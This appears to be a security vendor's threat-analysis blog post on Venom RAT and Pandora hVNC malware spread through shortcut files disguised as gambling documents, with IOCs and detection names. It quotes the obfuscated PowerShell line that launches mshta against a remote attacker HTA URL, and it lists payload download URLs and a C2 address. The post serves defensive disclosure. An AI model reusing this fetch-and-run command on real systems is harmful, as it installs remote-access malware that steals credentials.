AhnLab SEcurity intelligence Center (ASEC) has identified the distribution of RAT malware disguised as an illegal gambling-related file. Like the distribution method of VenomRAT introduced last month ([1]), the malware is spread via a shortcut (.lnk) file, and it downloads the RAT directly from HTA.
Figure 1. Operation process
The distributed shortcut file contains a malicious PowerShell command which runs mshta and downloads the malicious script.
- PowerShell command
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe . $env:C:\W*\S*2\m*h?a.* ‘hxxp://193.***.***[.]253:7287/2.hta.hta’
Figure 2. LNK properties
The malicious URLs in the confirmed shortcut file are as follows:
- hxxp://193.***.***[.]253:7287/2.hta.hta
- hxxp://193.***.***[.]253:7287/.hta
- hxxp://85.209.176[.]158:7287/6.hta
hxxp://193.***.***[.]253:7287/2.hta.hta contains VBS codes as it has in the past. Inside the VBS code, there are obfuscated legitimate document files and PowerShell commands that download the malicious RAT. The decoded PowerShell command is shown below.
Figure 3. Decoded PowerShell command
When the command shown in Figure 3 is executed, Excel file is downloaded from hxxp://193.***.***[.]253:7287/percent.xlsm, and saved as percent.xlsm inside the %APPDATA% folder. The downloaded Excel file (percent.xlsm) contains betting methods shown in Figure 4, hinting that the threat actor is targeting users interested in gambling.
Figure 4. Content within percent.xlsm
Afterward, the command downloads an additional executable from hxxp://193.***.***[.]253:7287/darkss.exe and saves it as darkss.exe inside the %APPDATA% folder. The downloaded executable is Venom RAT malware, which not only leaks keylogging and user credentials, but also performs various malicious activities by receiving commands from the threat actor.
Figure 5. Part of darkss.exe (Venom RAT) code
- C2 : 193.***.***[.]253:4449
Inside the previously mentioned URL (193.***.***[.]253:7287, 85.209.176[.]158:7287), other various malicious files exist in addition to those already mentioned in this post, such as HTA scripts, decoy document files, and malicious executables.
Figure 6. List of additional files found in the malicious URL
The additional decoy document files that have been found also contained information about gambling websites as well as personal information of some users.
Figure 7. Additional decoy document file 1 (2023_12.xlsx)
Figure 8. Additional decoy document file 2 (testDB.xlsx)
Darksoft111.exe and Pandora_cryptered.exe shown in Figure 6 are respectively Venom RAT and Pandora hVNC malware. Users are advised to take extra caution as the threat actor is using various types of RAT malware.
Figure 9. Part of Pandora_cryptered.exe (Pandora hVNC) code
[File Detection]
Downloader/LNK.Generic.S2541(2024.01.25.02)
Downloader/HTA.Agent (2024.01.29.03)
Trojan/Win.PWSX-gen (2024.01.12.03)
Trojan/Win.Krypt (2024.01.29.03)
[Behavior Detection]
Execution/MDP.Powershell.M2514
[IOC Info]
MD5
ac281f9830ee7f0a142cecc76fe59da9 (LNK)
20a88382040e47209e50652599d92440 (LNK)
cfe22644d656ca2fbdc44aaecb37fab9 (LNK)
15e98eb4a6fd73ff10cac751d467375e (HTA)
97e5b88cf1a452393c790ff84f08e3be (HTA)
9aa64f465c28e4d9af91af2fe2d29e5e (HTA)
04dc064b9e6fbc1466f5844c2dd422a4 (EXE)
a69f529f5fa414aba6af1f063ec7ce32 (EXE)
0bb437212ee1af602f7a34670825ff43 (EXE)
URL
hxxp://85.209.176[.]158:7287
85.209.176[.]158:1337
85.209.176[.]158:4449
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.
The post Distribution of RAT Malware Disguised as a Gambling-related File appeared first on ASEC BLOG.
Article Link: https://asec.ahnlab.com/en/61335/